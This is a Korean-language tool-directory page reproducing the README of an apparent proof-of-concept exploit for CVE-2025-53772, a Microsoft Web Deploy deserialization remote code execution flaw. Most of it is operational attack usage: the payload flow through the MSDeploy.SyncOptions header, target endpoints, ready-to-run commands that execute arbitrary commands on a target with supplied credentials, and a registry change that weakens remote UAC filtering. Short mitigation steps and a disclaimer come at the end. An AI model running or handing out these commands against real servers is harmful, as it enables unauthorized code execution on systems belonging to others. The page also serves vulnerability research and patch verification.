Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-53772 — cve-2025-53772를 위한 poc | Kitploit
도구/GitHubGitHub/sailay1996/cve-2025-53772
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubsailay1996/cve-2025-53772

CVE-2025-53772

cve-2025-53772를 위한 poc

저장소 보기
4611469개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-53772 - Microsoft Web Deploy 원격 코드 실행 익스플로잇

CVE-2025-53772를 대상으로 하는 Python 기반 익스플로잇으로, HTTP 헤더 데이터의 안전하지 않은 역직렬화로 인해 발생하는 Microsoft Web Deploy(msdeploy) 원격 코드 실행 취약점입니다.

🎬 POC 영상

POC


취약점 개요

도구 다운로드
속성값
CVE IDCVE-2025-53772
CVSS 점수8.8 (높음)
영향을 받는 제품Microsoft Web Deploy 4.0
취약한 버전< 10.0.2001
패치 버전10.0.2001+
취약점 유형신뢰할 수 없는 데이터의 역직렬화 (CWE-502)
인증필요 (낮은 권한)

작동 방식

이 취약점은 MSDeploy.SyncOptions HTTP 헤더의 역직렬화 과정에서 발생합니다. 특수하게 조작된 페이로드가 전송되면 서버는 BinaryFormatter를 사용해 이를 역직렬화하며, TypeConfuseDelegate 가젯 체인을 통해 임의 코드 실행이 발생합니다.

root@kitploit:~
Attacker                                    Target Server
   │                                              │
   │  POST /MSDEPLOYAGENTSERVICE HTTP/1.1         │
   │  MSDeploy.SyncOptions: <malicious_payload>   │
   │─────────────────────────────────────────────>│
   │                                              │
   │                            BinaryFormatter.Deserialize()
   │                                     │
   │                                     ▼
   │                            Process.Start("cmd.exe", "/c ...")
   │                                     │
   │                                     ▼
   │                              RCE Achieved!

영향을 받는 엔드포인트

엔드포인트포트프로토콜인증 유형
/MSDEPLOYAGENTSERVICE80HTTPNTLM
/msdeploy.axd8172HTTPSBasic

설치

root@kitploit:~
git clone https://github.com/sailay1996/CVE-2025-53772.git
cd CVE-2025-53772
pip install -r requirements.txt

요구 사항

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
requests-ntlm>=1.2.0

사용법

빠른 시작

root@kitploit:~
# Create proof file in C:\Windows\Temp\pwned.txt
python3 CVE-2025-53772.py -t <TARGET_IP> -u "<DOMAIN\username>" -P "<password>" --ntlm --proof-temp

CVE-2025-53772.py

옵션

root@kitploit:~
-t, --target      대상 IP 또는 호스트 이름 (필수)
-u, --user        사용자 이름 (필수)
-P, --password    비밀번호 (필수)
--port            대상 포트 (기본값: 80)
--endpoint        엔드포인트 경로 (기본값: /MSDEPLOYAGENTSERVICE)
--ntlm            NTLM 인증 사용 (에이전트 서비스에 필요)
--calc            calc.exe 실행
--proof-temp      C:\Windows\Temp\pwned.txt 생성
--proof-web       C:\inetpub\wwwroot\pwned.txt 생성
-c, --command     실행할 사용자 지정 명령
--generate-only   페이로드만 생성하고 전송하지 않음
-o, --output      페이로드를 파일로 저장

예제

에이전트 서비스 (포트 80 - NTLM 인증)

root@kitploit:~
# Pop calculator
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\Administrator" -P "P@ssw0rd" --ntlm --calc

# Create proof file in temp folder
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\webdeploy" -P "Password123" --ntlm --proof-temp

# Create proof file in webroot (verify via browser)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm --proof-web

# Execute custom command
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm -c "whoami > C:\Windows\Temp\whoami.txt"

# Generate payload only (don't send)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "test" -P "test" --generate-only --proof-temp -o payload.txt

WMSvc 서비스 (포트 8172 - 기본 인증)

root@kitploit:~
# Using msdeploy.axd endpoint (no --ntlm flag)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "webdeploy" -P "Password123" --port 8172 --endpoint "/msdeploy.axd" --proof-temp

검증

익스플로잇 실행 후 대상에서 실행 결과를 확인합니다:

root@kitploit:~
# Check for proof file
type C:\Windows\Temp\pwned.txt

# Or via browser (if --proof-web was used)
# Navigate to: http://<TARGET>/pwned.txt

일반적인 문제

401 권한 없음 (NTLM)

NTLM을 사용하는 에이전트 서비스에서 401 오류가 발생하는 경우:

root@kitploit:~
# On target, disable UAC remote filtering:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

404 찾을 수 없음 (msdeploy.axd)

IIS 핸들러가 등록되지 않았을 수 있습니다. 대신 에이전트 서비스 엔드포인트를 사용하세요:

root@kitploit:~
--port 80 --endpoint "/MSDEPLOYAGENTSERVICE"

취약한 버전 확인

root@kitploit:~
# Check installed version
(Get-Command msdeploy.exe).FileVersionInfo.FileVersion
# Vulnerable if < 10.0.2001

완화 조치

  1. Web Deploy를 버전 10.0.2001 이상으로 업데이트
  2. 방화벽을 통해 Web Deploy 엔드포인트에 대한 접근 제한
  3. 강력한 자격 증명 사용 및 비밀번호 재사용 방지
  4. 80/8172 포트에서 의심스러운 활동에 대한 로그 모니터링
  5. 필요하지 않으면 Web Deploy 비활성화

참고 자료

  • Microsoft 보안 공지
  • NVD - CVE-2025-53772
  • HawkTrace의 원본 연구

면책 조항

이 도구는 공인된 보안 테스트 및 교육 목적으로만 제공됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 테스트 전에 항상 적절한 승인을 받으십시오.


라이선스

MIT 라이선스